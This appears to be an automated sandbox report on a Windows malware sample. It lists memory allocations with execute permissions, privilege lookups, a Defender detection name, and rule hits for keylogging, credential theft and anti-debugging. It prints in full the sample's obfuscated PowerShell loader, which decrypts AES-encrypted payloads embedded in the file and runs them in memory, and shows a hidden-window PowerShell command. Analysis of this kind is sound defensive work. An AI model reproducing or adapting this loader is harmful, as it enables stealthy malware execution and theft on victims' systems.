protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -w hidden -c #
Microsoft Trojan:Script/Wacatac.H!ml
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description Match Windows Inet API call rule Str_Win32_Internet_API
description Escalate priviledges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Take ScreenShot rule ScreenShot
cmdline "C:\Users\test22\AppData\Local\Temp\Daggerhashimoto.bat.exe" $MBjw='SMCKsplMCKsiMCKstMCKs'.Replace('MCKs', '');$Zazk='CrMCKseaMCKsteMCKsDecMCKsryMCKspMCKstorMCKs'.Replace('MCKs', '');$pgyS='TMCKsraMCKsnMCKssfoMCKsrmMCKsFMCKsinMCKsalBMCKslocMCKskMCKs'.Replace('MCKs', '');$rnTg='LoaMCKsdMCKs'.Replace('MCKs', '');$yITi='MaMCKsinMCKsMoMCKsdMCKsuMCKsleMCKs'.Replace('MCKs', '');$byHR='InMCKsvMCKsokMCKseMCKs'.Replace('MCKs', '');$JJhF='ReaMCKsdMCKsLiMCKsneMCKssMCKs'.Replace('MCKs', '');$ddgl='FrMCKsomBMCKsasMCKse6MCKs4SMCKstMCKsrMCKsiMCKsnMCKsgMCKs'.Replace('MCKs', '');$Nzus='ChMCKsaMCKsnMCKsgMCKseExMCKstensMCKsioMCKsnMCKs'.Replace('MCKs', '');$qiSi='EnMCKstrMCKsyPMCKsoMCKsintMCKs'.Replace('MCKs', '');$KqEJ='GeMCKstCMCKsuMCKsrrenMCKstMCKsPrMCKsoMCKscessMCKs'.Replace('MCKs', '');$YUqa='FMCKsiMCKsrsMCKstMCKs'.Replace('MCKs', '');function VXISz($xJrBE){$UoLXN=[System.Security.Cryptography.Aes]::Create();$UoLXN.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UoLXN.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UoLXN.Key=[System.Convert]::$ddgl('fSbE/ELtQVO/Dxms7Zp6CXdDpMkm3eOggmV7ILPMdik=');$UoLXN.IV=[System.Convert]::$ddgl('m1sJUnjHj7LNCIVQjqF9xQ==');$HMveB=$UoLXN.$Zazk();$LvnIY=$HMveB.$pgyS($xJrBE,0,$xJrBE.Length);$HMveB.Dispose();$UoLXN.Dispose();$LvnIY;}function dZeca($xJrBE){$pwdAe=New-Object System.IO.MemoryStream(,$xJrBE);$kHODJ=New-Object System.IO.MemoryStream;$xUoxC=New-Object System.IO.Compression.GZipStream($pwdAe,[IO.Compression.CompressionMode]::Decompress);$xUoxC.CopyTo($kHODJ);$xUoxC.Dispose();$pwdAe.Dispose();$kHODJ.Dispose();$kHODJ.ToArray();}$DnbCX=[System.Linq.Enumerable]::$YUqa([System.IO.File]::$JJhF([System.IO.Path]::$Nzus([System.Diagnostics.Process]::$KqEJ().$yITi.FileName, $null)));$VdgtA=$DnbCX.Substring(3).$MBjw(':');$tdiJC=dZeca (VXISz ([Convert]::$ddgl($VdgtA[0])));$fSFdV=dZeca (VXISz ([Convert]::$ddgl($VdgtA[1])));[System.Reflection.Assembly]::$rnTg([byte[]]$fSFdV).$qiSi.$byHR($null,$null);[System.Reflection.Assembly]::$rnTg([byte[]]$tdiJC).$qiSi.$byHR($null,$null);
option -w hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe